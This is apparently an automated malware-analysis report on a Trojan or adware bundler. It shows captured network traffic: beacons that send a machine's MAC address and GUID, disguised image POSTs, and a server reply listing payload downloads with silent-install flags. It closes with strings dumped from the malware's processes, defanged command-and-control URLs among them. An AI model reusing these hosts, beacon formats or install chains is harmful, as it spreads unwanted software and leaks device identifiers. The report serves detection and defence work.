GET /client-cmd/cr.html?type=strunner&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686141 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=

x-amz-request-id: D796A67BE3DB4F2A

Date: Tue, 08 Sep 2015 04:22:19 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3

<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: lT87BVuI2CN/NrY59Jo2Y9N3Hmtps0jLBN1RxuAjEHbgghBoeZ4qE7KYQmQlDT04/u7p6p lnzU=..x-amz-request-id: D796A67BE3DB4F2A..Date: Tue, 08 Sep 2015 04:22:19 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..

GET /amm/apps/121/10100019/loader.js?x=1&cb=1441686142118&yt=81 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s10100019.xcodelib.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/javascript

Content-Length: 659

Connection: keep-alive

Date: Mon, 07 Sep 2015 17:27:48 GMT

Server: Apache

X-Powered-By: PHP/5.3.3

Cache-Control: max-age=86400

Expires: Tue, 08 Sep 2015 17:27:48 GMT

Content-Encoding: gzip

Vary: Accept-Encoding

Age: 39613

X-Cache: Hit from cloudfront

Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)

X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==

...........S[O.0.~.....hBY.B.[.0qyA..4..1r..5.vg;mY...qR....).}r..........`R.nLf.@...L.....bH.3.K.x..x_..K.$.e....Q....@cQ............BL.F....4...2$...|..h."..T..V./.Ku.Km.... #.`>...1...1.,.......=.......V..a..7..*@....d...2.&v.XR.Lz.........F....3..N.'1.Lb........i}/.......t.-..M...5.E..7?2...|..N.uU.F .Q..1..'........SG../......a..B......?..p....6.%.y....x.l".......|..H.3.....[K.1t....ZX...\Z.@..u........n.O..p.6......:.s.= ..m....".3.X...2.aoV.{.K. #..L.x..B.z...2"....K..4SN.....u..A..cu....O#...R...Y...........~z......x..*...... @.X.~bc<....i..#.~..J...R.0.|....\...........>....S.rY.<....<..8GQ{..PP._.I.....w....^lS9.u..Emf.G<.=M...h:....5L..w...HTTP/1.1 200 OK..Content-Type: application/javascript..Content-Length: 659..Connection: keep-alive..Date: Mon, 07 Sep 2015 17:27:48 GMT..Server: Apache..X-Powered-By: PHP/5.3.3..Cache-Control: max-age=86400..Expires: Tue, 08 Sep 2015 17:27:48 GMT..Content-Encoding: gzip..Vary: Accept-Encoding..Age: 39613..X-Cache: Hit from cloudfront..Via: 1.1 1f3fb60768611bd03244cf06312d5a9c.cloudfront.net (CloudFront)..X-Amz-Cf-Id: Ng373yrQ3DmckHn6wgZrGPIL6wiJlN7MvCp7qVNKrO2z7u3L0DNivw==.............S[O.0.~.....hBY.B.[.0qyA..4..1r..5.vg;mY...qR....).}r..........`R.nLf.@...L.....bH.3.K.x..x_..K.$.e....Q....@cQ............BL.F....4...2$...|..h."..T..V./.Ku.Km.... #.`>...1...1.,.......=.......V..a..7..*@....d...2.&v.XR.Lz.........F....3..N.'1.Lb........i}/.......t.-..M...5.E..7?2...|..N.uU.F .Q..1..'........SG../......a..B......?..p....6.%.y....x.l".......|..H.3

<<< skipped >>>

POST /DSS_Unq_IMapplication_mon_remote.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.stsunsetwest.com

Content-Length: 281

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&mode=checker&utid=194.242.96.218_2015-09-08_00:22:25&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&subid=&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ&DB=IE&arc=32&skexist=NO&avsexist=NO&advDetails=12~YES~0/419~NO~4/422~YES~0/432~NO~15/460~YES~0/575~NO~4/576~NO~4/

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 611

Connection: close

Content-Type: text/html; charset=UTF-8

422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0..422#RE3|mystartsearchSoftware\mystartsearchhp#RCMD|-pub_id=314 -adv_id=76#SLP|30^6#PKG|NO#INT|Mntz_Installer.exe..12#RE2|Systweak\RegClean Pro\Version 6.1#RCMD|/verysilent#SLP|10^3#FNV|WriteINI^hXXp://dl.ourinputinfonet.com/monti/llyun/hd/setup.exe#PKG|NO#INT|rcpsetup_17970.exe..

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 286

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeIyNeouNP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/fHtWSk1NSk9RT0pMSg==&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:08 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 388

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFP3p/f2J9VkpJSklJSUpSP4mOe2J9VkpJSkk/eomJYn1WSktKP3qAj36LVkpHSkdJR0xKP4COgn1WlFBPTVBeX01ORl9NWlxGTUlbXEZSXV1eRkpaXE5dTEtRTk9OXEZLSUpOeElSeElRlj+IjFZxaUxLP4Z6h45WYoeNfoU5XIiLiYiLeo2CiId4eHhvZpB6i35FOWKHfEc/f39WP3yBVj+CflZPR0lHS1JJSUdOTkpLP4Z6fFZJSUlcS1JfXU5OWl0/fYyLVoeIh34/iYB9VoeIh34/e4J9Vkk/e46CfVZKSUk/j4ZWSz+QhI2GVkpNP3x7VkpNTUpPUU9KTEo=&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:08 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:08 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 404

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeHqLjHw/en9/Yn1WSklKSUlJSlI/iY57Yn1WSklKST96iYlifVZKS0o/eoCPfotWSkdKR0lHTEo/gI6CfVaUUE9NUF5fTU5GX01aXEZNSVtcRlJdXV5GSlpcTl1MS1FOT05cRktJSk54SVJ4SVGWP4iMVnFpTEs/hnqHjlZih41+hTlciIuJiIt6jYKIh3h4eG9mkHqLfkU5Yod8Rz9/f1Y/fIFWP4J+Vk9HSUdLUklJR05OSks/hnp8VklJSVxLUl9dTk5aXT99jItWh4iHfj+JgH1Wh4iHfj97gn1WST97joJ9VkpJST+PhlZLP5CEjYZWSk0/fHtWSk1NSk9RT0pMUA==&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:14 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;....

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 394

Connection: Keep-Alive

key=jZKJflaCh4yNeoWFeH6HfT96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSkxR&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:14 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:14 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;..

GET /os/rm/OfferScreen_422.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1426709167"

Last-Modified: Wed, 18 Mar 2015 20:06:07 GMT

Cache-Control: max-age=32746

Content-Length: 7218

Content-Type: application/zip

X-HW: 1441686147.dop009.fr7.t,1441686146.cds009.fr7.c

PK........Q~.B...._...........inner.png.V.P.i..da.QP...h.......$.!$ G.`........4$...UP.Ee8,..%.(.............u5..."r8r8......).j_U.....wW.......V. ...~.4.f5.<yz..w...].b..f.X.@&.H ...s!.O...........#.H.0.-c3.$.,Bs.u..Q<b^.=...^,$..P.PLF.k....|2*...2..P..7E..R..y).<"....pW.4."H....8... .>..4..k....".%.~s.........h.#.K...3.t........b1 ..uq..$....._...&..HL...[....#...0..\..;.aI4.$...,...9j4...b.G.(.Z/0. )O"...a10..p.D...Z.A..`.N,.~I.&e..'.........-.1!..........I.D.OS......:..|....D.).'....E.X.G#.4_.|!.D.P..>T.......5..\])x...........aAgW"..s.r%.@..G.i>T".......A....X*..y..V....U,.*.82X...q......`i...PYx4....|X../..O!.0...H`..9.$.....q....?9.h...W.,\i:p~.{.o....H....f4>}...@.t..(...oB.......h3A.g.....o..i)L...1:m..s.I..e.['/.p..U~..n..X..qzYd{./...Z...^..>..\..>w....!.PY44...a?.;%x....%..........kU....y.B_a.( ....,T#*.M..2iLI..C.. .FX....c.%:.s....F.@..wN}.i.....lb..&.........uV_.m.J....S3U.N. ..Y>f6f.t.....F...d....tBf..z....t..E.......u....m_u...77.vI.jVEn.00.....Z<[2....OZj].....n.0.Q. ....H..8.L62.zJ.'...X..d.......>...T......(.X....i.|...>L*ub......l.o..qe.>f6........{'e....z..p.wM...'....d!.-J.fn.K8".WD...... .ld>Rrb..........K...gz.....5l......4}...e2Q~9,..!...2..K....}.W.._....eM...Et\...|S. .1#/..82rkH....n..O.\m.b.........g.t~E....gN...q.%...;'"..^4m.............w.e......38..V.L......^.u..j.e.......Cvi.......vq$k'.....S.N..op.9.WV<g.. wmS............b.z$.9.>.7.T.....u.>.....-.<ps......K.v. .<.H...F.F....w.9................G.%..u......w.{....LB..

<<< skipped >>>

GET /os/rm/OfferScreen_12_HD.zip HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:26 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1411022125"

Last-Modified: Thu, 18 Sep 2014 06:35:25 GMT

Cache-Control: max-age=32746

Content-Length: 10048

Content-Type: application/zip

X-HW: 1441686147.dop010.fr7.t,1441686146.cds037.fr7.c

PK.........l$Etbj.....=-......OfferScreen_12.html.:kS#7..C..A.......G.6P.0.....;x6...5%w.m............#...s..!.#...S...w..../.....v.....S.t...vN..w.w._?.?~`.......tR ^..g..... ...b..-vz.L....[.5...c..N.2.%..k.D.v^({.......?......\8... ~...Qr....u..R$,...%N..>...t.....ryw?a......e.......(.x5...8...;9).........Q..6i.$.W........8s........{..j.,..i.!.[...w.....`....&:[.;6.....Je.Wb..F.....`k..T.....<.....h.....f.j...`.W......n..q...,..g\t..kU....irm...,.I....y......BpsG.#.W.f..0..Bfn6...)oG3.$.;...C.{h.........(..-..A.p..Ay..f.(..`o{ow....D......`.N..L.y..](q.?-.....|.(J ..h....Iy......<...,U.=b..6 Ww....!.cV.2c...~.}...f..QI. ......U.F...\E.................Zdn^.....~...I...{d{.4..H...h.&...j..2..u....*..z...M.t..Rp....'..%b.......W...... <.[......4.88.......r..wmPr.....0...APy......;.l..=.u....3....R......z..#$R..._...(Ig".........e..._..*1js......v..(..l5.K...z@...w[..0m..a.....V.&......q.;.....xs`>.j.6..&.U.W...!L.!r.._1~...Z......HH..8....7....!...=e..P....g2....p...D...:B..^..$3..'.@....c.....q..f..l6)tz.by.5....{.m..]u.I.L({.t....Az...P..|....;1...{.f...g..J.^...p......M.....'....=... ....Q.'V...#.~.u ....YJ*(^.R...-...~......XP6..W.....gHx.]...`.5.......7.....#..A...d.~we1.......G... ..g."-....Q....P.n.."wOAb."C.. `g...r`t....i......q......^.>............. S.. !|..9D.6..r.}....n&-.. Y2{-KF....[...{......... ...g.ELH.!....pz&v......@........N~;...jP.....?........ZQ.;......;x.x.....{ C....vq'.7LfGI..}6c........J.......<...h5m.C.~..7)@c....8>......;.....L..%.. .).=o8....b&........-..h..

<<< skipped >>>

POST /rp/v/image.jpg HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: cdn.austries.com

Content-Length: 436

Connection: Keep-Alive

key=jZKJflZ6fI2Cj34/fIeNVkk/iYuPjYZWSUp4SUp4SUt4SUl4SUk/fYVWTD96f39ifVZKSUpJSUlKUj+JjntifVZKSUpJP3qJiWJ9VkpLSj96gI9+i1ZKR0pHSUdMSj+AjoJ9VpRQT01QXl9NTkZfTVpcRk1JW1xGUl1dXkZKWlxOXUxLUU5PTlxGS0lKTnhJUnhJUZY/iIxWcWlMSz+GeoeOVmKHjX6FOVyIi4mIi3qNgoiHeHh4b2aQeot+RTlih3xHP39/Vj98gVY/gn5WT0dJR0tSSUlHTk5KSz+GenxWSUlJXEtSX11OTlpdP32Mi1aHiId+P4mAfVaHiId+P3uCfVZJP3uOgn1WSklJP4+GVks/kISNhlZKTT98e1ZKTU1KT1FPSk1P&x=1

HTTP/1.1 200 OK

Cache-Control: no-cache

Content-type: image/gif

Date: Tue, 08 Sep 2015 04:22:23 GMT

Server: Google Frontend

Content-Length: 43

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Cache-Control: no-cache..Content-type: image/gif..Date: Tue, 08 Sep 2015 04:22:23 GMT..Server: Google Frontend..Content-Length: 43..GIF89a.............!.......,...........D..;..

GET /client-cmd/cr.html?type=install&affId=10100019&pubId=1010&appId=121&agver=1.1.0.31&guid={7647EF45-F4AC-40BC-9DDE-1AC5D328565C-2015_09_08}&os=XP32&manu=Intel Corporation___VMware, Inc.&ff=&ch=&ie=6.0.2900.5512&mac=000C29FD55AD&dsr=none&pgd=none&bid=0&buid=100&vm=2&wktm=14&cb=1441686132 HTTP/1.1

Host: s3.zawss.info

Connection: Keep-Alive

HTTP/1.1 200 OK

x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=

x-amz-request-id: 5CA84AF807EBB1C3

Date: Tue, 08 Sep 2015 04:22:09 GMT

Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT

ETag: "d152c08a253fe1bd8ede751d571ac800"

Accept-Ranges: bytes

Content-Type: text/html

Content-Length: 36

Server: AmazonS3

<html>..<body>..ok..</body>..</html>HTTP/1.1 200 OK..x-amz-id-2: IDc8l YobxREKOQZRwpLsJAxlqUxwch52hitKwNL8iYdO7OiyAnHIWIoOFtAfpn1TIXHaDs39jk=..x-amz-request-id: 5CA84AF807EBB1C3..Date: Tue, 08 Sep 2015 04:22:09 GMT..Last-Modified: Tue, 28 Apr 2015 16:05:06 GMT..ETag: "d152c08a253fe1bd8ede751d571ac800"..Accept-Ranges: bytes..Content-Type: text/html..Content-Length: 36..Server: AmazonS3..<html>..<body>..ok..</body>..</html>..

POST /FCL_Co_Unq_remote_v5.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: VVV.fcesneim.us

Content-Length: 107

Connection: Keep-Alive

Cache-Control: no-cache

from=nsis&type=Reg&pubid=15690&CbId=10656&BundleVersionID=IM_240914@01&mid=qGKynuZ0mulJUhgaWZBaX8M7O6jfLzmQ

HTTP/1.1 200 OK

Date: Tue, 08 Sep 2015 04:22:25 GMT

Server: Apache/2.2.15 (CentOS)

X-Powered-By: PHP/5.3.3

Content-Length: 1870

Connection: close

Content-Type: text/html; charset=UTF-8

<<< skipped >>>

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

taeako.exe_372:

.text

`.rdata

@.data

.rsrc

@.reloc

>%u0V

operator

GetProcessWindowStation

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

RegCreateKeyTransactedA

RegOpenKeyTransactedA

RegDeleteKeyTransactedA

Advapi32.dll

RegDeleteKeyExA

GetProcessHeap

KERNEL32.dll

USER32.dll

RegDeleteKeyA

RegCloseKey

RegQueryInfoKeyW

RegEnumKeyExA

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÃ

%Documents and Settings%\All Users\Application Data\IlejwTivc\taeako.exe

7-787m7}7

6'676^6{6

:":(:2:=:

2 2$2(2,2

combase.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

tae3ko.exe_1932:

.text

`.rdata

@.data

.rsrc

@.reloc

PSShE3@

GetProcessWindowStation

operator

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

GetProcessHeap

KERNEL32.dll

USER32.dll

RegCreateKeyExW

RegQueryInfoKeyW

RegDeleteKeyW

RegOpenKeyExW

RegEnumKeyExW

RegCloseKey

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

zcÃ

1*21272|2

3.44484

6#6,616>6

combase.dll

@mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

Advapi32.dll

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

%Documents and Settings%\All Users\Application Data\IlejwTivc\tae3ko.exe

dag17797.exe_552:

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

verifying installer: %d%%

hXXp://nsis.sf.net/NSIS_Error

... %d%%

~nsu.tmp

%u.%u%s%s

RegDeleteKeyExA

%s=%s

*?|/":

\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll

hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe

ttp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\nsCBHTML5.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp

\Windows\CurrentVersion\Uninstall\avast

Nullsoft Install System v11-Jul-2014.cvs

GetProcessHeap

OLEAUT32.dll

WININET.dll

MSVCRT.dll

nsWeb.dll

6(7.767;7

4<.pd>

%u X`i@

_$,ZS.db

o7.6.3

0*%UP

q.ya!

nsd5.tmp

2.html?

/cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe

2~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

1454464

ments and Settings\"%CurrentUserName%"\Local Settings\Application Data\tmp30731\dag17797.exe"

{EEEE69B8-2C42-4825-B8E6-9597957D672B}

VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport

ft Windows XP

"%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe"

%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731

dag17797.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd4.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%Documents and Settings%\%current user%\Local Settings\Application Data\tmp30731\dag17797.exe

1638692

738853988

1310942

1114350

1048822

1310906

194.242.96.218_2015-09-08_00:22:25

422~hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

ttp://secured.nmsgv.us/os/rm/OfferScreen_422.zip~hXXp://VVV.djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01#12~hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

1245428

872744016

1114338

hXXp://VVV.fcesneim.us/FCL_Co_Unq_remote_v5.php

hXXp://VVV.stsunsetwest.com/DS_Unq_trackstats_mon.php

hXXp://VVV.stsunsetwest.com/DSS_Unq_IMapplication_mon_remote.php

\Program Files\Internet Explorer\iexplore.exe" -nohome

hXXp://VVV.stsunsetwest.com/DS_AdvAffiliateId.php

hXXp://secured.nmsgv.us/os/rm/OfferScreen_422.zip

hXXp://VVV.djapp.info/?file=bundle

hXXp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip

RE3|Opera Software

Opera

.96.218_2015-09-08_00:22:25

iliateId.php

mote.php

OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd5.tmp\FirstResult.txt

tp://secured.nmsgv.us/os/rm/OfferScreen_12_HD.zip

p_17970.exe

djapp.info/?file=bundle~hXXp://VVV.djapp.info/?file=bundle~null~0~1~0.01

systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

Default,RE2|Opera Software,RE3|Opera Software

oudfront.systweak.com/downloads/new/rcpsetup_17970.exe~hXXp://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0~0

)-.Yln

Nullsoft Install System v11-Jul-2014.cvs

hXXp://VVV.microsoft.com

dag17797.exe_552_rwx_10004000_00001000:

callback%d

taedko.exe_1604:

.text

`.rdata

@.data

.rsrc

@.reloc

D$@j.Xf

>%u0V

j.Yf;

_tcPVj@

.PjRW

M%D,3

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

n%D,3

%s\data

%s%s.js

jquery4toolbar.js

content/jquery4toolbar.js

TrayIcons/logo.ico

logo.ico

In CallJS -> %s

In CallJS.Invoke -> 0xX

in DispInvoke: Searching -> %s

atiexecute

-exe "%s"

..\GetStylesUpdater.exe

%s%s.exe

chrome.exe

%s --new-window --app-window-size=%d,%d --app="%s"

cmd /C %s

http\shell\open\command

chrome

firefox

opera

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s

%sTrayIcons\

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

close://close.it/

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

Chrome_WidgetWin_1

MozillaWindowClass

%s%s%s%s%s%s%s%s%s%s%s%s%s%s

hXXp://

%s%s%s%s%s%s%s%s%s%s%s%s

\\.\pipe\61FDC17A-A7B6-4BEB-9B8E-1709DF12376C

%s%s.dat

advapi32.dll

RegDeleteKeyA

%sLow

RegDeleteKeyExA

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

%s%s%s%s%s%s%s%s

%s%s%s%s

%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

RegCreateKeyTransactedA

RegOpenKeyTransactedA

RegDeleteKeyTransactedA

Advapi32.dll

GetProcessHeap

CreateIoCompletionPort

CreateNamedPipeA

ConnectNamedPipe

DisconnectNamedPipe

KERNEL32.dll

EnumWindows

USER32.dll

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegEnumKeyExA

RegCreateKeyExA

RegOpenKeyW

RegQueryInfoKeyW

RegOpenKeyA

RegEnumKeyExW

ADVAPI32.dll

SHELL32.dll

ole32.dll

OLEAUT32.dll

SHLWAPI.dll

DeleteUrlCacheEntry

WININET.dll

URLDownloadToCacheFileA

urlmon.dll

gdiplus.dll

OLEACC.dll

GetCPInfo

zcÃ

%Documents and Settings%\All Users\Application Data\IlejwTivc\taedko.exe

9!919;9_9

283F3a3~3

4'454-8@8

4'444=4{:

combase.dll

mscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

portuguese-brazilian

update.exe

%s\Volatile Environment

.default

S-%d-%x-%lu-%lu-%lu-%lu-%lu-%lu-%lu-%lu

{8856F961-340A-11D0-A96B-00C04FD705A2}

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps